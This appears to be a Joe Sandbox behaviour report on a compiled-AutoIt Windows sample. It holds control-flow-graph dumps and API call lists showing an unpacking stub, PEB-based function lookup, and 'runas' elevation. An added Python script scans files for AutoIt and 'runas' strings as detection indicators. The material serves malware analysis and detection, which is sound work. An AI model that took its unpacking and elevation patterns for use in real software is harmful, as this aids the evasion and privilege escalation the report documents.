99847 f3e85a 100052 f5fcb1 89 API calls 4 library calls 99847->100052 99851 f06c54 99853 f077c7 59 API calls 99851->99853 99852 f3e876 99855 f06cc1 99852->99855 99854 f06c60 
99853->99854 99979 f20b9b 60 API calls __ftell_nolock 99854->99979 99857 f3e889 99855->99857 99858 f06ccf 99855->99858 99860 f05dcf CloseHandle 99857->99860 99861 f077c7 59 API calls 99858->99861 99859 f06c6c 99862 f077c7 59 API calls 99859->99862 99864 f3e895 99860->99864 99865 f06cd8 99861->99865 99863 f06c78 99862->99863 99866 f048ae 60 API calls 99863->99866 99867 f04f3d 135 API calls 99864->99867 99868 f077c7 59 API calls 99865->99868 99869 f06c86 99866->99869 99870 f3e8b1 99867->99870 99871 f06ce1 99868->99871 99980 f059b0 ReadFile SetFilePointerEx 99869->99980 99873 f3e8da 99870->99873 99876 f697e5 122 API calls 99870->99876 99989 f046f9 99871->99989 100053 f5fcb1 89 API calls 4 library calls 99873->100053 99875 f06cb2 99981 f05c4e 99875->99981 99880 f3e8cd 99876->99880 99877 f06cf8 99881 f07c8e 59 API calls 99877->99881 99882 f3e8f6 99880->99882 99883 f3e8d5 99880->99883 99884 f06d09 SetCurrentDirectoryW 99881->99884 99885 f04faa 84 API calls 99882->99885 99886 f04faa 84 API calls 99883->99886 99890 f06d1c Mailbox 99884->99890 99888 f3e8fb 99885->99888 99886->99873 99887 f06e6c Mailbox 99952 f05934 99887->99952 99889 f20ff6 Mailbox 59 API calls 99888->99889 99896 f3e92f 99889->99896 99892 f20ff6 Mailbox 59 API calls 99890->99892 99894 f06d2f 99892->99894 99893 f03bcd 99893->98540 99893->98549 99895 f0538e 59 API calls 99894->99895 99922 f06d3a Mailbox __wsetenvp 99895->99922 99897 f0766f 59 API calls 99896->99897 99929 f3e978 Mailbox 99897->99929 99898 f06e47 99901 f3eb69 100058 f67581 59 API calls Mailbox 99901->100058 99905 f3eb8b 100059 f6f835 59 API calls 2 library calls 99905->100059 99908 f3eb98 99910 f22f95 _free 58 API calls 99908->99910 99909 f3ec02 99910->99887 99913 f0766f 59 API calls 99913->99929 99916 f3ebfa 99919 f07f41 59 API calls 99919->99922 99922->99898 99922->99909 99922->99916 99922->99919 100040 f059cd 67 API calls _wcscpy 99922->100040 100041 f070bd GetStringTypeW 99922->100041 100042 f0702c 60 API calls __wcsnicmp 99922->100042 
100043 f0710a GetStringTypeW __wsetenvp 99922->100043 100044 f2387d GetStringTypeW _iswctype 99922->100044 100045 f06a3c 164 API calls 3 library calls 99922->100045 100046 f07373 59 API calls Mailbox 99922->100046 99923 f07f41 59 API calls 99923->99929 99927 f3ebbb 100060 f5fcb1 89 API calls 4 library calls 99927->100060 99929->99901 99929->99913 99929->99923 99929->99927 100054 f5fc4d 59 API calls 2 library calls 99929->100054 100055 f5fb6e 61 API calls 2 library calls 99929->100055 100056 f67621 59 API calls Mailbox 99929->100056 100057 f07373 59 API calls Mailbox 99929->100057 99930 f3ebd4 99931 f22f95 _free 58 API calls 99930->99931 99932 f3e8f1 99931->99932 99932->99887 99934 f0770f 99933->99934 99938 f07682 _memmove 99933->99938 99936 f20ff6 Mailbox 59 API calls 99934->99936 99935 f20ff6 Mailbox 59 API calls 99937 f07689 99935->99937 99936->99938 99939 f076b2 99937->99939 99940 f20ff6 Mailbox 59 API calls 99937->99940 99938->99935 99939->99819 99940->99939 99942 f074d0 99941->99942 99945 f0757e 99941->99945 99943 f20ff6 Mailbox 59 API calls 99942->99943 99946 f07502 99942->99946 99943->99946 99944 f20ff6 59 API calls Mailbox 99944->99946 99945->99819 99946->99944 99946->99945 99947->99804 99948->99819 99949->99819 99950->99819 99951->99813 99953 f05dcf CloseHandle 99952->99953 99954 f0593c Mailbox 99953->99954 99955 f05dcf CloseHandle 99954->99955 99956 f0594b 99955->99956 99956->99893 99958 f20ff6 Mailbox 59 API calls 99957->99958 99959 f05916 99958->99959 99960 f05dcf CloseHandle 99959->99960 99961 f05921 99960->99961 99962 f077c7 59 API calls 99961->99962 99963 f05929 99962->99963 99964 f05dcf CloseHandle 99963->99964 99965 f05930 99964->99965 99966 f05956 99965->99966 99967 f05dcf CloseHandle 99966->99967 99968 f05962 99967->99968 100063 f05df9 99968->100063 99970 f059a4 99970->99847 99970->99851 99971 f05981 99971->99970 100071 f05770 99971->100071 99973 f05993 100088 f053db SetFilePointerEx SetFilePointerEx 99973->100088 99975 f0599a 99975->99970 99976 
[Control-flow graph data (node/edge list of the disassembled functions) omitted. Recoverable content: functions in the 00F00000 image (the AutoIt runtime) that call SetFilePointerEx, ReadFile, WriteFile, CreateFileW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, FreeLibrary, GetFullPathNameW, LoadIconW, CharUpperBuffW, VariantClear, CloseHandle, GetLastError, GetStdHandle, OleInitialize, CreateThread, GetTempPathW, RegisterClipboardFormatW, PostQuitMessage, NtdllDefWindowProc_W, SetTimer, KillTimer, CreatePopupMenu, MoveWindow, SetFocus, Shell_NotifyIconW, DeleteObject and DestroyWindow; a stub at 0102B090 that loops over LoadLibraryA/GetProcAddress, calls VirtualProtect twice and ExitProcess; and code in a separate memory region at 018E0000 that resolves functions through the PEB (GetPEB), opens and reads a file with CreateFileW/ReadFile, allocates with VirtualAlloc, releases with VirtualFree and FindCloseChangeNotification, and calls Sleep.]

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F03B7A
                                    • IsDebuggerPresent.KERNEL32 ref: 00F03B8C
                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00FC62F8,00FC62E0,?,?), ref: 00F03BFD
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                      • Part of subcall function 00F10A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F03C26,00FC62F8,?,?,?), ref: 00F10ACE
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F03C81
                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00FB93F0,00000010), ref: 00F3D4BC
                                    • SetCurrentDirectoryW.KERNEL32(?,00FC62F8,?,?,?), ref: 00F3D4F4
                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00FB5D40,00FC62F8,?,?,?), ref: 00F3D57A
                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00F3D581
                                      • Part of subcall function 00F03A58: GetSysColorBrush.USER32(0000000F), ref: 00F03A62
                                      • Part of subcall function 00F03A58: LoadCursorW.USER32(00000000,00007F00), ref: 00F03A71
                                      • Part of subcall function 00F03A58: LoadIconW.USER32(00000063), ref: 00F03A88
                                      • Part of subcall function 00F03A58: LoadIconW.USER32(000000A4), ref: 00F03A9A
                                      • Part of subcall function 00F03A58: LoadIconW.USER32(000000A2), ref: 00F03AAC
                                      • Part of subcall function 00F03A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F03AD2
                                      • Part of subcall function 00F03A58: RegisterClassExW.USER32(?), ref: 00F03B28
                                      • Part of subcall function 00F039E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F03A15
                                      • Part of subcall function 00F039E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F03A36
                                      • Part of subcall function 00F039E7: ShowWindow.USER32(00000000,?,?), ref: 00F03A4A
                                      • Part of subcall function 00F039E7: ShowWindow.USER32(00000000,?,?), ref: 00F03A53
                                      • Part of subcall function 00F043DB: _memset.LIBCMT ref: 00F04401
                                      • Part of subcall function 00F043DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F044A6
                                    Strings
                                    • runas, xrefs: 00F3D575
                                    • This is a third-party compiled AutoIt script., xrefs: 00F3D4B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                    • API String ID: 529118366-3287110873
                                    • Opcode ID: b6592e247230646b1bd727e140de90329c0ff43e3b23acf14240258db441104a
                                    • Instruction ID: 9019eccf804abeda5cfac721feccd697cbd1dbbbf76a6643eb408c6751cada14
                                    • Opcode Fuzzy Hash: b6592e247230646b1bd727e140de90329c0ff43e3b23acf14240258db441104a
                                    • Instruction Fuzzy Hash: 0A51D371D0824DAEDF11EBB4DD06EED7BB9AF05710B0480A9F411E31E2DA78A645FB21
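The API sequence in the entry above (GetCurrentDirectoryW, IsDebuggerPresent, GetFullPathNameW, a MessageBoxA carrying the text "This is a third-party compiled AutoIt script.", the "AutoIt v3" window class passed to CreateWindowExW, and ShellExecuteW with the "runas" verb) is the start-up code of the AutoIt v3 runtime rather than the payload itself, which is what the "Binary is likely a compiled AutoIt script file" signature keys on. The "runas" verb asks the shell to relaunch the process elevated (a UAC prompt), which is how the runtime implements the #RequireAdmin directive and is the behaviour behind "Contains functionality to execute programs as a different user". The following Python triage script is an added example, not part of the Joe Sandbox report or of AutoIt: it scans a PE image for those strings in the encodings the report shows (the MessageBoxA text is ANSI, the CreateWindowExW/ShellExecuteW arguments are UTF-16LE) and for the "AU3!EA06" marker that AutoIt v3 writes in front of the embedded compiled script (external knowledge, not something the report shows). The sample image bytes are constructed for the demonstration and stand in for the real file.

```python
"""Static triage for compiled-AutoIt indicators in a PE image.

Added example (not part of the Joe Sandbox report). Looks for the strings the
report shows the AutoIt runtime passing to MessageBoxA, CreateWindowExW and
ShellExecuteW, plus the "AU3!EA06" marker that precedes the embedded compiled
script. The SAMPLE bytes below are constructed; use scan_file() on a real file.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# ANSI string shown in the report as the MessageBoxA argument (ref 00F3D4BC).
STUB_MESSAGE = b"This is a third-party compiled AutoIt script."
# Wide strings: the window class/title passed to CreateWindowExW and the
# ShellExecuteW verb that requests elevation (UAC prompt).
WIDE_MARKERS = {
    "AutoIt v3 window class": "AutoIt v3".encode("utf-16-le"),
    "runas verb": "runas".encode("utf-16-le"),
}
# Marker written by AutoIt v3 before the compiled script body (external
# knowledge about the AutoIt format; the report itself does not show it).
AU3_MARKER = b"AU3!EA06"


@dataclass
class AutoItIndicators:
    hits: Dict[str, List[int]] = field(default_factory=dict)

    @property
    def is_compiled_autoit(self) -> bool:
        # The stub message identifies the AutoIt runtime; the AU3 marker shows
        # a compiled script is embedded rather than just the interpreter.
        return "stub message" in self.hits and "AU3!EA06 marker" in self.hits

    @property
    def requests_elevation(self) -> bool:
        # The wide "runas" string is what the runtime hands to ShellExecuteW.
        return "runas verb" in self.hits


def _find_all(hay: bytes, needle: bytes) -> List[int]:
    """Return every offset at which needle occurs in hay."""
    return [m.start() for m in re.finditer(re.escape(needle), hay)]


def scan_bytes(data: bytes) -> AutoItIndicators:
    """Scan an in-memory image for the indicators and record their offsets."""
    result = AutoItIndicators()
    needles = {"stub message": STUB_MESSAGE, "AU3!EA06 marker": AU3_MARKER}
    needles.update(WIDE_MARKERS)
    for name, needle in needles.items():
        offsets = _find_all(data, needle)
        if offsets:
            result.hits[name] = offsets
    return result


def scan_file(path: str) -> AutoItIndicators:
    """Scan a file on disk (for example the submitted sample)."""
    with open(path, "rb") as fh:
        return scan_bytes(fh.read())


# Constructed sample: a fake image carrying the indicators at known offsets
# (stub message at 0x40, wide class name at 0x6E, wide verb at 0x82,
# AU3 marker at 0x9E). Not bytes from the real sample.
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + STUB_MESSAGE + b"\x00"
    + "AutoIt v3".encode("utf-16-le") + b"\x00\x00"
    + "runas".encode("utf-16-le") + b"\x00\x00"
    + b"\x00" * 16
    + AU3_MARKER + b"<compiled script body>"
)

if __name__ == "__main__":
    r = scan_bytes(SAMPLE)
    for name, offs in r.hits.items():
        print(f"{name:24s} at {[hex(o) for o in offs]}")
    print("compiled AutoIt:", r.is_compiled_autoit,
          "| elevation via runas:", r.requests_elevation)
```

Searching both encodings matters: a scanner that only looks for ANSI "runas" or "AutoIt v3" misses the wide strings the W-suffixed APIs in this report actually consume, while the MessageBoxA text is only present as ANSI. A hit on the stub message without the AU3 marker means the AutoIt interpreter is present but no script was found by this simple scan (for example because the resource is encrypted or the marker variant differs), so treat the two properties separately.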

                                    Control-flow Graph

                                    [Control-flow graph of the window procedure at 00F03633 omitted (node/edge list with executed and not-executed blocks). Recoverable content: message handlers covering 00F03633-00F03765 and 00F3D2BF-00F3D3A9 that call NtdllDefWindowProc_W, PostQuitMessage, SetTimer and RegisterClipboardFormatW, CreatePopupMenu, KillTimer, MoveWindow and SetFocus, with subcalls to 00F044CB (Shell_NotifyIconW), 00F03114 (DeleteObject, DestroyWindow), 00F111D0, 00F111F3, 00F62A16, 00F04531, 00F045DF, 00F5817E and 00F043DB.]
                                    APIs
                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00F036D2
                                    • KillTimer.USER32(?,00000001), ref: 00F036FC
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F0371F
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00F0372A
                                    • CreatePopupMenu.USER32 ref: 00F0373E
                                    • PostQuitMessage.USER32(00000000), ref: 00F0375F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                    • String ID: TaskbarCreated
                                    • API String ID: 157504867-2362178303
                                    • Opcode ID: 392e17469a6220292edcc7008b1543cb2d177683399715acd99c897a8b709e2c
                                    • Instruction ID: 87b507c42a62b3cc171544673e8fc86e32becb653fca93b837c6d823eebf8238
                                    • Opcode Fuzzy Hash: 392e17469a6220292edcc7008b1543cb2d177683399715acd99c897a8b709e2c
                                    • Instruction Fuzzy Hash: 2F4129B260810DBBDF145F68ED0AFBD375DEB04310F540129FA02D72E2CA66AD54B761

                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 00F04B2B
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                    • GetCurrentProcess.KERNEL32(?,00F8FAEC,00000000,00000000,?), ref: 00F04BF8
                                    • IsWow64Process.KERNEL32(00000000), ref: 00F04BFF
                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00F04C45
                                    • FreeLibrary.KERNEL32(00000000), ref: 00F04C50
                                    • GetSystemInfo.KERNEL32(00000000), ref: 00F04C81
                                    • GetSystemInfo.KERNEL32(00000000), ref: 00F04C8D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                    • String ID:
                                    • API String ID: 1986165174-0
                                    • Opcode ID: d7011bcdbe0b51e4aa99cf09b3df9611b841d0d748f87d413e9268a65e87ecd0
                                    • Instruction ID: 9fa43fc52d6de5cadf229e689a02149055cf4e69a53f52b972b0fe5c0c9d6892
                                    • Opcode Fuzzy Hash: d7011bcdbe0b51e4aa99cf09b3df9611b841d0d748f87d413e9268a65e87ecd0
                                    • Instruction Fuzzy Hash: B991E4B194ABC4DEC731DB6894512AAFFE4AF65310F44499DD1CB83A81D234F908F729

                                    APIs
                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F04EEE,?,?,00000000,00000000), ref: 00F05010
                                    • LoadResource.KERNEL32(?,00000000,?,?,00F04EEE,?,?,00000000,00000000,?,?,?,?,?,?,00F04F8F), ref: 00F3DD60
                                    • SizeofResource.KERNEL32(?,00000000,?,?,00F04EEE,?,?,00000000,00000000,?,?,?,?,?,?,00F04F8F), ref: 00F3DD75
                                    • LockResource.KERNEL32(00F04EEE,?,?,00F04EEE,?,?,00000000,00000000,?,?,?,?,?,?,00F04F8F,00000000), ref: 00F3DD88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Resource$FindLoadLockSizeof
                                    • String ID: SCRIPT
                                    • API String ID: 3473537107-3967369404
                                    • Opcode ID: 96ff7ded7698efe9699d6394acf8cddddc4c8324af50b6314eec4fa70e6110c8
                                    • Instruction ID: 34d3252e68eb8f9f4841ca18fb8e740fc37ccd9ef861169c86b1dd9e6383150a
                                    • Opcode Fuzzy Hash: 96ff7ded7698efe9699d6394acf8cddddc4c8324af50b6314eec4fa70e6110c8
                                    • Instruction Fuzzy Hash: 9D115A75600705AFD7218B65DC58FAB7BB9EBC9B21F204168F406C62A0DBA1E804AA60

                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 0102B1CA
                                    • GetProcAddress.KERNEL32(?,01024FF9), ref: 0102B1E8
                                    • ExitProcess.KERNEL32(?,01024FF9), ref: 0102B1F9
                                    • VirtualProtect.KERNELBASE(00F00000,00001000,00000004,?,00000000), ref: 0102B247
                                    • VirtualProtect.KERNELBASE(00F00000,00001000), ref: 0102B25C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    • Opcode ID: 23541f9e59454a2d9e2887b6924b1b0ef772fcad5e6488aeae9571c2eb912020
                                    • Instruction ID: 5f4d6272e74d0fc4b2a544b72bba6bbd10862b839d76982040dd76fb357c5704
                                    • Opcode Fuzzy Hash: 23541f9e59454a2d9e2887b6924b1b0ef772fcad5e6488aeae9571c2eb912020
                                    • Instruction Fuzzy Hash: FA512A72A543725BD7229EBCDCC06B47BE4EB42220B6C0779DAF5C73C6E794580A8760
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,00F3E7C1), ref: 00F646A6
                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00F646B7
                                    • FindClose.KERNEL32(00000000), ref: 00F646C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FileFind$AttributesCloseFirst
                                    • String ID:
                                    • API String ID: 48322524-0
                                    • Opcode ID: c66466595e210e62346492bf4dda107b962ad1397df267cf70cf09d86fc11a7e
                                    • Instruction ID: 2810acd3f0f0295d139453f9916a31664f4ae6e80994d56f81d51a6498609bec
                                    • Opcode Fuzzy Hash: c66466595e210e62346492bf4dda107b962ad1397df267cf70cf09d86fc11a7e
                                    • Instruction Fuzzy Hash: 51E026328104046F8610B738EC4D8FABB9CDE46335F100726F836C24E0EBB0AD64A7DA
                                    Strings
                                    • Variable must be of type 'Object'., xrefs: 00F4428C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Variable must be of type 'Object'.
                                    • API String ID: 0-109567571
                                    • Opcode ID: 267866ecdd66deb58269efce586a497e229f1f6adfe35ec879278309341ce6ea
                                    • Instruction ID: 87d706ce4754d32da90e1916aa5d6ff1d643c16a4b59176aa3142eb2d25477aa
                                    • Opcode Fuzzy Hash: 267866ecdd66deb58269efce586a497e229f1f6adfe35ec879278309341ce6ea
                                    • Instruction Fuzzy Hash: F0A28C75E04209CFCB24CF58C980BA9B7B1FF58320F648469E916AB391D735AD46FB81
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F10BBB
                                    • timeGetTime.WINMM ref: 00F10E76
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F10FB3
                                    • TranslateMessage.USER32(?), ref: 00F10FC7
                                    • DispatchMessageW.USER32(?), ref: 00F10FD5
                                    • Sleep.KERNEL32(0000000A), ref: 00F10FDF
                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00F1105A
                                    • DestroyWindow.USER32 ref: 00F11066
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F11080
                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00F452AD
                                    • TranslateMessage.USER32(?), ref: 00F4608A
                                    • DispatchMessageW.USER32(?), ref: 00F46098
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F460AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                    • API String ID: 4003667617-3242690629
                                    • Opcode ID: ef52d74fbe476566e899b57737f8d856ce8af836ce7f5ca8d3b61e31633940c2
                                    • Instruction ID: 73599ec80493dfce8d9df4eb87de2d537697f9adbd92c5a984348c1db1acfc67
                                    • Opcode Fuzzy Hash: ef52d74fbe476566e899b57737f8d856ce8af836ce7f5ca8d3b61e31633940c2
                                    • Instruction Fuzzy Hash: 0BB2D471A08741DFD724EF24C885BAABBE4BF84714F14491DF84987292DB75E884FB82

                                    APIs
                                      • Part of subcall function 00F691E9: __time64.LIBCMT ref: 00F691F3
                                      • Part of subcall function 00F05045: _fseek.LIBCMT ref: 00F0505D
                                    • __wsplitpath.LIBCMT ref: 00F694BE
                                      • Part of subcall function 00F2432E: __wsplitpath_helper.LIBCMT ref: 00F2436E
                                    • _wcscpy.LIBCMT ref: 00F694D1
                                    • _wcscat.LIBCMT ref: 00F694E4
                                    • __wsplitpath.LIBCMT ref: 00F69509
                                    • _wcscat.LIBCMT ref: 00F6951F
                                    • _wcscat.LIBCMT ref: 00F69532
                                      • Part of subcall function 00F6922F: _memmove.LIBCMT ref: 00F69268
                                      • Part of subcall function 00F6922F: _memmove.LIBCMT ref: 00F69277
                                    • _wcscmp.LIBCMT ref: 00F69479
                                      • Part of subcall function 00F699BE: _wcscmp.LIBCMT ref: 00F69AAE
                                      • Part of subcall function 00F699BE: _wcscmp.LIBCMT ref: 00F69AC1
                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F696DC
                                    • _wcsncpy.LIBCMT ref: 00F6974F
                                    • DeleteFileW.KERNEL32(?,?), ref: 00F69785
